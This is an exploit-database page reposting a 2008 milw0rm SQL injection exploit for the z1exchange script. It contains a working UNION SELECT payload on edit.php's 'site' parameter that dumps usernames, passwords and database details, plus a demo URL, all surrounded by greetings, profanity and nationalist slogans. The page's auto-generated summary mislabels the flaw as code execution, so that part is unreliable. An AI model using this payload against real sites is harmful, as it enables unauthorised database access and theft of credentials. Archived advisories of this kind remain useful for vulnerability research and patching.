JIKO FroM No-exploit.Com

vendor:

z1exchange

by:

jiko

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: z1exchange

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The malicious request contains a payload that when processed by the vulnerable application, it will execute the attacker's code on the server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------
  --          JIKO FroM No-exploit.Com        ---
-------------------------------------------------------------------------
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-exploit.Com
# Script  : z1exchange-->http://1scripts.net/scripts/z1exchange.zip
 Proud To Be MoroCCaN -->> WwW.No-ExploiT.CoM  , WwW.Exploiter5.CoM
Fkhatar L3chran wwlad darb wlidat l9issm wmansach L3chira
=========================[JAWAD Cha7ta 4 ever]===================
# Exploit  :
               http://no-exploit.com

http://no-exploit.com//z1exchange/edit.php?site=[sql]
http://no-exploit.com//z1exchange/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users--

DEMO:

http://localhost/scripts/z1exchange/z1exchange/edit.php?site=-12 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

=========================[Thanks To Allah ]===================
 greetz : all my friend and all No-exploit members and
 $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $
MizoZ $ leopard
 all muslims
 visit: www.no-exploit.Com
 Visit: My-montada.Co.cc For your free Forum
 
-------------------------------------------------------------------------
  --          JIKO FroM No-exploit.Com        ---
-------------------------------------------------------------------------
------==        troops of Mohamed comming inchalah     =-----------------
Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
Raha nayda Nood :)Fuck Bigg Kbir Lkarcha Bo ta7cha stoon dyalibou7do hwa cha7ta
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++          [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!]        ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++

# milw0rm.com [2008-12-01]